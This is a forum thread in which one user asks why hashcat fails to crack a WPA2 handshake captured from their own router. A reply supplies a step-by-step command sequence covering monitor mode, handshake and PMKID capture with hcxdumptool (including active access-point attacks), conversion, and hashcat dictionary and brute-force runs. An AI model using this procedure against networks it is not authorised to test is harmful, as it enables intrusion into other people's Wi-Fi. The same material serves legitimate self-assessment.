PDA

View Full Version : bruteforce wifi password device



swls
2022-05-22, 17:15
Hi, I train in ethical hacking both system and network level.


I'm trying to brute force my wifi password from my sfr box.


I managed to pull out a .cap wireshark file where I captured the handshake connection of a wifi device.


I attempted to use kali linux and find the password via a rockyou.txt password list, in 9h it didn't find the password.


https://ibb.co/6Y3PP1T
Indeed, it is a long password with alpha numeric character + "!".


I think it will be impossible to find it.
I converted the .cap file to then I ran on windows ashcat -a 3 -m 2500 ?2?2?2?2?2?2?2? hashcat-wpa2.hccapx






But it tells me that the 2500 plugin no longer exists so I replace it with 22000:


and it always gives me "No hashes loaded."


Same if I do "hashcat-6.2.5>hashcat -m 22000 -a 3 wpa2.hccapx d?d?d?d?d?d?d?d?"


https://ibb.co/hMkw4Bs


I am attaching a screenshot and the .cap file https://ufile.io/72klwxnn and converted to .hccapx to at least see if I captured it well and if it was not this step that screwed up








Thanks very much

m87quasar
2022-06-04, 18:54
Hi, first of all stop using aircrack-ng, use hcxdumptool instead

sudo apt update && sudo apt full-upgrade -y
sudo apt install hcxdumptool
sudo apt install hcxtools
sudo reboot -f


Use this method to put wifi device in monitor mode, do not use aircrack-ng to put wifi device in monito mode, hcxdumptool will not work if you do

sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo iw dev wlan0 set txpower fixed 3000 [if you own a Alfa AC1900, this increases the pwr but a sensitive antennae is also important]
sudo ip link set wlan0 up
sudo iw dev OR sudo iw wlan0 info [chk if device is in monitor mode]


This should get you going in the right direction

sudo hcxdumptool -i wlan0 -o [name].pcapng --active_beacon --enable_status=15 [this number can be 1, 15 or 31 refer to --help]
sudo hcxdumptool -i wlan0 -o [name].pcapng --disable_deauthentication --disable_ap_attacks --active_beacon -t 3600 --enable_status=15 [24 hr attack]


Convert .pcapng to .hc22000, hcxpcapngtool is part of hcxtools

sudo hcxpcapngtool -o [name].hc22000 [name].pcang [*.pcapng* converts all pcang files into a single hc22000 file, its not recommended as data can be messed up in conversion]


Hashcat, these are just basic but will get you going

sudo hashcat -m 22000 [name].hc22000 -a 0 [wordlist]
sudo hashcat -m 22000 [name].hc22000 -a 3 [brute force]

To find the hashcat potfile

sudo find / | grep "hashcat.potfile"
sudo su [login as root]
cd /root/.local/share/hashcat/
sudo nano hashcat.potfile


Did you install Cuda for hashcat so it can make use of your GPU, do you have a hashcat compatible GPU?

sudo apt update
sudo apt update && sudo apt full-upgrade -y
sudo apt install nvidia-driver nvidia-cuda-toolkit -y
sudo reboot -f
sudo nvidia-smi [chk communication / driver / temp etc]

Airgeddon

The reason for not using aircrack-ng is that when converting to hashcat format additional information is stripped out, important information that hashcat can use

I would put Kali on a separate drive, I think 35 GB is the smallest partition for kali and run hashcat natively



Hope this helps you